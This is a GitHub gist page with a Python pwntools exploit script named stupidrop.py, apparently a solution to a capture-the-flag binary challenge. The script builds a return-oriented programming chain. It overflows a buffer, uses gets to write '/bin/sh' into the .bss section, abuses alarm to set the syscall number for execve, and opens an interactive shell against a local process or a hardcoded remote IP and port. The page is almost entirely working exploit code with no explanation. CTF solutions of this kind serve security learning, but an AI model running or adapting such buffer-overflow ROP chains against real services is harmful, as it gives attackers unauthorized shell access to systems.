Skip to content

Instantly share code, notes, and snippets.

@berdoezt

berdoezt/stupidrop.py

Created December 18, 2017 13:45
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save berdoezt/d26bf99e092687a31121f29ff5f28779 to your computer and use it in GitHub Desktop.
Save berdoezt/d26bf99e092687a31121f29ff5f28779 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
stupidrop.py
#!/usr/bin/env python
from pwn import *
import sys
LOCAL = 1
if LOCAL:
a = process('./stupidrop')
if len(sys.argv) == 2:
gdb.attach(a, 'b *0x0000000000400637')
else:
a = remote('104.196.127.247', 5555)
poprdi = 0x00000000004006a3 # : pop rdi ; ret
poprsir15 = 0x00000000004006a1 # : pop rsi ; pop r15 ; ret
bss = 0x0000000000601048
syscall = 0x000000000040063e # : syscall
p = 'a'*0x30
p += 'b'*8
p += p64(poprdi)
p += p64(bss)
p += p64(0x00000000004004D0) # plt gets
#=================================================
p += p64(poprsir15)
p += p64(0)
p += p64(0)
p += p64(poprdi)
p += p64(59) # syscall execve
p += p64(0x00000000004004B0) # plt alarm
p += p64(0x00000000004004B0) # plt alarm
p += p64(poprdi)
p += p64(bss)
p += p64(syscall)
#=================================================
a.sendline(p)
a.sendline('/bin/sh\x00')
a.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment